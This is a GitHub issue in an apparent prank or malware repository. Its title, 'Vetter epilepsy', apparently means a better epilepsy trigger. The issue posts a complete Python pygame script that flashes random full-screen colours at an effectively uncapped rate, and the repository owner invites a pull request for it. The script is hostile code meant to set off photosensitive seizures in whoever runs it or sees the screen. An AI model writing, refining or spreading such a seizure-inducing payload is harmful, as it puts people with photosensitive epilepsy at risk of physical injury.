### ISSUE TITLE
Vetter epilepsy

### ISSUE THREAD

**Issue by 97-42** [MEGA-Dawg68/Edge2Virus#1]
import pygame
import subprocess
import sys
import random
import time
import pyautogui

pygame.init()

width, height = pygame.display.Info().current_w, pygame.display.Info().current_h

screen = pygame.display.set_mode((width, height), pygame.FULLSCREEN)
pygame.display.set_caption("Flashing Colors")

clock = pygame.time.Clock()

def random_color():
    return (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))

running = True
while running:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False

   
    screen.fill(random_color())

   
    pygame.display.flip()

    
    clock.tick(50000)  

   

pygame.quit()
sys.exit()

**Comment by MEGA-Dawg68** [comment]
Make a pull request I will have a look
